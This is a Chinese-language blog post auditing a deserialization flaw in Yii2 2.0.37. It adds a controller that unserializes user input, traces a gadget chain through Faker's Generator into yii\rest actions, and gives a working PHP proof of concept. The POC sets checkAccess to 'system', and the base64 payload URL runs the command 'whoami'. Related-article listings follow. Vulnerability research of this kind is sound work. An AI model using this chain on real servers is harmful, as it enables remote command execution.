yii2.0.37反序列化漏洞审计

最新推荐文章于 2024-05-17 08:14:59 发布
最新推荐文章于 2024-05-17 08:14:59 发布
阅读量604 收藏
点赞数
分类专栏: 代码审计 文章标签: php 安全漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39360114/article/details/121972420
版权

源码地址

https://github.com/yiisoft/yii2/releases/tag/2.0.37

一、审计工具

phpstrom2020.1.3

二、审计步骤

1.由于刚刚搭建完成,yii本身并没有可以利用来反序列化的Action,所以添加controllers/TestController.php,代码如下

<?php
namespace app\controllers;
use Yii;
use yii\web\Controleer;

class TestController extends Controller
{
    public function actionTtt(){
        $name = Yii:$app->request->get('data');
        return unserialize(base64_decode($name));
    }
}

2.根据师傅们爆出的漏洞入口点定位在:vendor/yiisoft/yii2/db/BatchQueryResult.php的reset方法内,当对象被销毁时,会调用reset()方法,当传入参数的值不为空的时候,会触发close()函数,但是调用的$this->close(),本类中并不存在此方法函数,由于参数在我们编写利用Action时是可控的,所以可以利用该处触发PHP魔术函数_call()进行利用。

3.接下来利用phpstrom全文查找利用到_call的地方,在/vendor/fzaninotto/faker/src/Faker/Generator.php处可以利用,跟进方法format(),当传入一个方法名,传入一个数组,会利用call_user_func_array(),熟悉PHP的小伙伴们都知道,这个函数非常危险,可以利用执行系统命令,各种函数命令等。

public function format($formatter, $arguments = array())
{
    return call_user_func_array($this->getFormatter($formatter), $arguments);
}

4.在返回call_user_func_array()函数中的第一个参数为getFormatter返回的值,跟进getFormatter()方法,它会判断formatters[$formatter]属性是否设置,然后返回该属性,说明该属性是可以让我们反序列化利用是控制的。

public function getFormatter($formatter)
{
    if (isset($this->formatters[$formatter])) {
        return $this->formatters[$formatter];
    }
    foreach ($this->providers as $provider) {
        if (method_exists($provider, $formatter)) {
            $this->formatters[$formatter] = array($provider, $formatter);

            return $this->formatters[$formatter];
        }
    }
    throw new \InvalidArgumentException(sprintf('Unknown formatter "%s"', $formatter));
}

5.根据现在已有的条件寻找程序中能利用到的点,且要满足以下条件:

1.方法的参数必须是自己类中存在的。

2.方法需要具有命令执行的功能。

6.全文查找处2处合适的地方。

vendor/yiisoft/yii2/rest/CreateAction.php

 

vendor/yiisoft/yii2/rest/IndexAction.php
 

 

7.至此POP链形成:
 

POP:yii\db\BatchQueryResult::__destruct()->reset()->close()->Faker\Generator::__call()->format()->call_user_func_array()->yii\rest\IndexAction::run->call_user_func()
 

三、漏洞复现
 

1.漏洞POC
 

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            $this->checkAccess = 'system';
            $this->id = '1';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;
    class Generator{
        protected $formatters;

        public function __construct(){
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}

namespace yii\db{
    use Faker\Generator;
    class BatchQueryResult{
        private $_dataReader;

        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
//进行序列化和base64编码
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
    //TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6Indob2FtaSI7fWk6MTtzOjM6InJ1biI7fX19fQ==
}
?>
 

2.访问payload:http://ip/index.php?r=test/test&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czo2OiJzeXN0ZW0iO3M6MjoiaWQiO3M6Njoid2hvYW1pIjt9aToxO3M6MzoicnVuIjt9fX19
 

 

 


                

        

        

    




    

      

        

            

              
                
                  Soufaker
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
Yii2框架 序列漏洞复现(CVE-2020-15148)

				
			

			

				

					snowlyzz的博客
				

				

					10-25
					
					1740
					
				

			

		

		

			
				
yii2框架 序列漏洞复现

			
		

	



                

              
                



	

		

			

				
					
yii2框架 序列漏洞复现

				
			

			

				

					Zero_Adam的博客
				

				

					06-19
					
					1234
					
				

			

		

		

			
				
前言
跟着feng师傅再学习一下yii2的序列漏洞,提高代码审计能力
漏洞出现在yii2.0.38之前的版本中,在2.0.38进行了修复,CVE编号是CVE-2020-15148:

Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls unserialize() on arbitrary user input. This is fixed in

			
		

	



                


  
              

                


	

		

			

				
					
yii序列漏洞复现及利用

				
			

			

				

					weixin_44576725的博客
				

				

					04-06
					
					5447
					
				

			

		

		

			
				
yii序列漏洞
Yii框架
Yii 是一个适用于开发 Web2.0 应用程序的高性能PHP 框架。
Yii 是一个通用的 Web 编程框架,即可以用于开发各种用 PHP 构建的 Web 应用。 因为基于组件的框架结构和设计精巧的缓存支持,它特别适合开发大型应用, 如门户网站、社区、内容管理系统(CMS)、 电子商务项目和 RESTful Web 服务等。
Yii 当前有两个主要版本:1.1 和 2.0。 1.1 版是上代的老版本,现在处于维护状态。 2.0 版是一个完全重写的版本,采用了最新的技术和协议

			
		

	





	

		

			

				
					
Goby 漏洞发布|天擎终端安全管理系统 YII_CSRF_TOKEN 远程代码执行漏洞_奇安信天擎漏洞(1)

				
			

			

				

					2401_84302761的博客
				

				

					05-13
					
					829
					
				

			

		

		

			
				
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!

			
		

	



		

			
		



	

		

			

				
					
Goby 漏洞发布|天擎终端安全管理系统 YII_CSRF_TOKEN 远程代码执行漏洞

				
			

			

				

					m0_46699477的博客
				

				

					07-19
					
					2193
					
				

			

		

		

			
				
奇安信天擎是奇安信集团旗下一款致力于一体终端安全解决方案的终端安全管理系统(简称“天擎”)产品。奇安信天擎终端安全管理系统web部分使用yii框架 该版本框架自带序列入口点,攻击者可执行任意代码获取服务器权限。

			
		

	





	

		

			

				
					
Goby 漏洞发布|天擎终端安全管理系统 YII_CSRF_TOKEN 远程代码执行漏洞_奇安信天擎漏洞

				
			

			

				

					2301_81327376的博客
				

				

					04-13
					
					615
					
				

			

		

		

			
				
奇安信天擎是奇安信集团旗下一款致力于一体终端安全解决方案的终端安全管理系统(简称“天擎”)产品。奇安信天擎终端安全管理系统web部分使用yii框架 该版本框架自带序列入口点,攻击者可执行任意代码获取服务器权限。这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。奇安信天擎终端安全管理系统web部分使用yii框架 该版本框架自带序列入口点,攻击者可执行任意代码获取服务器权限。

			
		

	





	

		

			

				
					
[CTFSHOW web267]Yii2 序列漏洞(CVE-2020-15148)

				
			

			

				

					Landasika的博客
				

				

					05-17
					
					1288
					
				

			

		

		

			
				
目录

[CTFSHOW web267]Yii2 序列漏洞(CVE-2020-15148)一、什么是YiiYii 是什么YiiYii 最适合做什么?二、漏洞分析三、漏洞pocyii 2.0.37 以前yii 2.0.37 以后四、WEB_267
[CTFSHOW web267]Yii2 序列漏洞(CVE-2020-15148)
一、什么是Yii

参考官网

https://ww...

			
		

	





	

		

			

				
					
yii2.0.chm

				
			

			

				

					03-09
				

			

		

		

			
				
此“yii2.0.chm”文件是一个帮助文档,旨在为开发者提供详尽的指南和参考,使其能更高效地利用 Yii 2.0 进行开发。CHM(Compiled HTML Help)格式是一种微软编译后的 HTML 帮助文件,它允许用户通过内置的索引和搜索...

			
		

	





	

		

			

				
					
Yii 2.0.39.2

				
			

			

				

					05-01
				

			

		

		

			
				
Yii 2.0.39.2 更新日志:2020-11-13修复测试环境中的键入-setup.md;错误#18396:修复不抛出`InvalidConfigException`当某些情况下无法通过DI容器实例类时;更新pipline语法;修复phpdoc命令中的属性检查。

			
		

	





	

		

			

				
					
Yii frxamework 应用程序开发框架 v2.0.15.1

				
			

			

				

					10-14
				

			

		

		

			
				
Yii 2.0.15.1是该框架的一个特定版本,旨在提供性能优和稳定性改进。在这个版本中,开发者可以期待一系列增强的功能和修复的问题,以提升开发体验。  Yii框架的核心特性包括MVC(模型-视图-控制器)架构模式,这...

			
		

	





	

		

			

				
					
yii2.0.chm手册

				
			

			

				

					03-09
				

			

		

		

			
				
12. **国际和本地**:Yii支持多语言应用,手册会介绍如何设置语言环境,以及使用翻译功能。  13. **性能优**:手册会提供各种性能优技巧,包括使用缓存、数据库优、减少HTTP请求等。  14. **测试**:Yii ...

			
		

	





	

		

			

				
					
yii2.0.chm版手册

				
			

			

				

					03-09
				

			

		

		

			
				
综上所述,Yii 2.0.chm 手册涵盖了框架的基本概念、组件、数据库操作、错误处理、国际等多个方面,对于深入理解和高效开发 Yii 2.0 应用至关重要。通过学习这个手册,开发者可以充分利用 Yii 2.0 的强大功能,快速...

			
		

	





	

		

			

				
					
所有Yii2 版本 序例漏洞修复

				
			

			

				

					笨鸟的博客
				

				

					11-24
					
					759
					
				

			

		

		

			
				
什么是序列漏洞

   也叫PHP对象注入,漏洞形成的根本原因是程序没有对用户输入的序列字符串进行检测,导致序列过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。这个漏洞并不是PHP特有,在Java、Python其他语言也存在,原理基本相通。



比较典型的PHP漏洞可能会用到的魔术方法

  1.void __wakeup(void)

  2.void __construct ([ mixed $args [, $... ]])

 ...

			
		

	





	

		

			

				
					
15-PHP代码审计——yii 2.0.37序列漏洞

				
			

			

				

					网络安全
				

				

					06-06
					
					1187
					
				

			

		

		

			
				
Yii是一套基于组件、用于开发大型Web应用的高性能PHP框架。Yii2 2.0.38 之前的版本存在序列漏洞,如果程序内部调用了unserialize() 序列时,那么程序就可能存在序列漏洞,攻击者可通过构造特定的恶意请求执行任意命令。



影响版本:


yii2 v2.0.37版本以下


环境:


yii-basic-app-2.0.37.tgz

php7.0以上


poc:


http://www.yii2.com/web/index.php?r=test/sss&.

			
		

	





	

		

			

				
					
通过几道CTF题学习yii2框架

					
最新发布

				
			

			

				

					dzqxwzoe的博客
				

				

					05-17
					
					653
					
				

			

		

		

			
				
Yii是一套基于组件、用于开发大型 Web 应用的高性能 PHP 框架,之前的版本存在序列漏洞,程序在调用时,攻击者可通过构造特定的恶意请求执行任意命令,本篇就分析一下yii2利用链以及如何自己去构造payload,并结合CTF题目去学习yii2框架。

			
		

	





	

		

			

				
					
CVE-2020-15148 Yii序列漏洞复现

				
			

			

				

					绮洛Ki1ro的博客
				

				

					08-05
					
					852
					
				

			

		

		

			
				
CVE-2020-15148 Yii序列漏洞复现

			
		

	





	

		

			

				
					
深入谈谈apply和call

				
			

			

				

					小破船借箭的博客
				

				

					09-15
					
					1040
					
				

			

		

		

			
				
深入谈谈apply和call。
这篇文章是本小猿生写的第一篇文章,不喜勿喷,还望大佬批评指教,共同进步,好了废话不多说,下面开始胡扯。
apply和call方法的相同点

apply()和call()方法的作用都是改变this 的指向,也是他们的相同点。

apply和call方法的不同点

apply() 和 call() 方法的区别在于 接收参数的方式不同

apply()  方法,两个参数,
第一个参数是this修改后的指向。
第二个参数是一个数组。
call() 方法,
第一个参数是this修改后的

			
		

	





	

		

			

				
					
java代码审计--序列

				
			

			

				

					goddemon
				

				

					09-15
					
					920
					
				

			

		

		

			
				
1.挖掘思路
序列利用链通常分为三部分,触发点、中继点、执行点
2.序列序列基础知识点
序列序列相关类与函数
Java.io.ObjectOutputStream  //序列实现方法-->从这个目标流写的和输出的都是序列
java.io.ObjectInputStream   //序列实现方法-->从这个输出流写的和输出的都是序列
//相关步骤
对象序列步骤
1) 创建一个对象输出流,它可以包装一个其他类型的目标输出流,如文件输出流;
2) 通过对象输出流的wri

			
		

	





	

		

			

				
					
yii2 console.php

				
			

			

				

					06-06
				

			

		

		

			
				
Yii2是一个基于PHP的Web应用程序框架,提供了丰富的功能和工具来开发高效、安全和可扩展的Web应用程序。console.php是Yii2框架中的一个命令行脚本,用于执行各种命令和任务,如数据库迁移、生成代码等。您可以在终端中使用以下命令来运行console.php:

```
php /path/to/your/yii-application/yii <command>
```

其中,`/path/to/your/yii-application/`是您的Yii应用程序的路径,`<command>`是要执行的命令。例如,要运行数据库迁移命令,可以使用以下命令:

```
php /path/to/your/yii-application/yii migrate
```

希望这可以帮助您理解console.php在Yii2中的作用。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值